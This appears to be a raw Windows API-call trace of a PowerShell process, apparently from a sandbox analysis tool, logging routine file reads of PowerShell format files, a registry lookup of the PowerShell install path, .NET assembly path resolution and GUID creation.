	[0054.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.286] GetLastError () returned 0x0
	[0054.286] SetErrorMode (uMode=0x1) returned 0x1
	[0054.286] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.286] GetLastError () returned 0x0
	[0054.286] GetFileType (hFile=0x2fc) returned 0x1
	[0054.286] SetErrorMode (uMode=0x1) returned 0x1
	[0054.286] GetFileType (hFile=0x2fc) returned 0x1
	[0054.287] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.287] GetLastError () returned 0x0
	[0054.288] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.288] GetLastError () returned 0x0
	[0054.288] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.288] GetLastError () returned 0x0
	[0054.289] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.289] GetLastError () returned 0x0
	[0054.289] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.289] GetLastError () returned 0x0
	[0054.290] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0xfb2, lpOverlapped=0x0) returned 1
	[0054.290] GetLastError () returned 0x0
	[0054.290] ReadFile (in: hFile=0x2fc, lpBuffer=0x234193e, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x234193e*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.290] GetLastError () returned 0x0
	[0054.290] ReadFile (in: hFile=0x2fc, lpBuffer=0x23421ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x23421ec*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.290] GetLastError () returned 0x0
	[0054.290] CloseHandle (hObject=0x2fc) returned 1
	[0054.290] GetLastError () returned 0x0
	[0054.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.291] GetLastError () returned 0x0
	[0054.291] SetErrorMode (uMode=0x1) returned 0x1
	[0054.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2362a7c | out: lpFileInformation=0x2362a7c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1f4ab5, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1f4ab5, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd374b67c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0054.291] GetLastError () returned 0x0
	[0054.291] SetErrorMode (uMode=0x1) returned 0x1
	[0054.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.291] GetLastError () returned 0x0
	[0054.291] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.291] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.291] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.291] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.291] GetLastError () returned 0x0
	[0054.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0054.291] GetLastError () returned 0x0
	[0054.293] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xb9f11ffa, Data2=0x57c4, Data3=0x4293, Data4=([0]=0x9d, [1]=0xee, [2]=0x7c, [3]=0xf4, [4]=0x83, [5]=0x2b, [6]=0x69, [7]=0x17))) returned 0x0
	[0054.300] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xda33052d, Data2=0x73b, Data3=0x4763, Data4=([0]=0xae, [1]=0xe6, [2]=0x29, [3]=0xa1, [4]=0xda, [5]=0x8f, [6]=0xc2, [7]=0x26))) returned 0x0
	[0054.302] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x3ea9b465, Data2=0xe53a, Data3=0x4888, Data4=([0]=0xb6, [1]=0x22, [2]=0x9d, [3]=0x23, [4]=0x7a, [5]=0xfb, [6]=0x49, [7]=0xc5))) returned 0x0
	[0054.302] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x2032fe72, Data2=0x6258, Data3=0x4d01, Data4=([0]=0xb2, [1]=0xb, [2]=0x9a, [3]=0x2, [4]=0x3f, [5]=0x3a, [6]=0x50, [7]=0x4e))) returned 0x0
	[0054.302] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xa4b29c9d, Data2=0xbfbf, Data3=0x46c8, Data4=([0]=0xac, [1]=0x93, [2]=0x8c, [3]=0xb5, [4]=0x74, [5]=0x6b, [6]=0xe, [7]=0x4a))) returned 0x0
	[0054.302] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xe9912210, Data2=0xdb5e, Data3=0x4457, Data4=([0]=0xbc, [1]=0x23, [2]=0x3f, [3]=0xda, [4]=0x3e, [5]=0xae, [6]=0xa1, [7]=0x33))) returned 0x0
	[0054.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.302] GetLastError () returned 0x0
	[0054.302] SetErrorMode (uMode=0x1) returned 0x1
	[0054.302] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0054.303] GetLastError () returned 0x0
	[0054.303] GetFileType (hFile=0x2fc) returned 0x1
	[0054.303] SetErrorMode (uMode=0x1) returned 0x1
	[0054.303] GetFileType (hFile=0x2fc) returned 0x1
	[0054.303] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.304] GetLastError () returned 0x0
	[0054.348] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.349] GetLastError () returned 0x0
	[0054.349] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.349] GetLastError () returned 0x0
	[0054.349] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.349] GetLastError () returned 0x0
	[0054.350] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.350] GetLastError () returned 0x0
	[0054.350] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.350] GetLastError () returned 0x0
	[0054.350] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0xaca, lpOverlapped=0x0) returned 1
	[0054.351] GetLastError () returned 0x0
	[0054.351] ReadFile (in: hFile=0x2fc, lpBuffer=0x2381a8e, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2381a8e*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.351] GetLastError () returned 0x0
	[0054.351] ReadFile (in: hFile=0x2fc, lpBuffer=0x2382424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2382424*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.351] GetLastError () returned 0x0
	[0054.351] CloseHandle (hObject=0x2fc) returned 1
	[0054.351] GetLastError () returned 0x0
	[0054.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.351] GetLastError () returned 0x0
	[0054.351] SetErrorMode (uMode=0x1) returned 0x1
	[0054.351] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x23a3420 | out: lpFileInformation=0x23a3420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a051ba0, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a051ba0, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2d2d8fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0054.351] GetLastError () returned 0x0
	[0054.351] SetErrorMode (uMode=0x1) returned 0x1
	[0054.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.351] GetLastError () returned 0x0
	[0054.351] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.352] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.352] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.352] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.352] GetLastError () returned 0x0
	[0054.352] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0054.352] GetLastError () returned 0x0
	[0054.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0054.364] GetLastError () returned 0x0
	[0054.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0054.366] GetLastError () returned 0x57
	[0054.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0054.383] GetLastError () returned 0x57
	[0054.389] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.389] GetLastError () returned 0x57
	[0054.395] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0054.395] GetLastError () returned 0x57
	[0054.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0054.439] GetLastError () returned 0x57
	[0054.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0054.441] GetLastError () returned 0x57
	[0054.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0054.442] GetLastError () returned 0x57
	[0054.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0054.450] GetLastError () returned 0x57
	[0054.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0054.454] GetLastError () returned 0x57
	[0054.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0054.460] GetLastError () returned 0x57
	[0054.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0054.465] GetLastError () returned 0x57
	[0054.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0054.471] GetLastError () returned 0x57
	[0054.524] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0054.524] GetLastError () returned 0x57
	[0054.526] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0054.526] GetLastError () returned 0x57
	[0054.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3a
	[0054.527] GetLastError () returned 0x57
	[0054.527] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0054.527] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0054.528] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da84, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.528] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.528] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.528] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.528] GetLastError () returned 0x57
	[0054.528] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.528] GetLastError () returned 0x57
	[0054.555] VirtualQuery (in: lpAddress=0x22cf70, lpBuffer=0x22df70, dwLength=0x1c | out: lpBuffer=0x22df70*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.561] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x88dac689, Data2=0xb401, Data3=0x41e3, Data4=([0]=0x96, [1]=0xc8, [2]=0x28, [3]=0x67, [4]=0x5c, [5]=0x9e, [6]=0x49, [7]=0x3a))) returned 0x0
	[0054.562] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x1e51434e, Data2=0x40e2, Data3=0x4c6e, Data4=([0]=0x97, [1]=0x90, [2]=0xdc, [3]=0xb4, [4]=0xb5, [5]=0xfb, [6]=0x98, [7]=0xcf))) returned 0x0
	[0054.562] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.562] VirtualQuery (in: lpAddress=0x22cfe8, lpBuffer=0x22dfe8, dwLength=0x1c | out: lpBuffer=0x22dfe8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.563] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x23f1f4b8, Data2=0xb5dd, Data3=0x4f99, Data4=([0]=0xa2, [1]=0x12, [2]=0x22, [3]=0x2e, [4]=0x1, [5]=0xda, [6]=0x29, [7]=0x1b))) returned 0x0
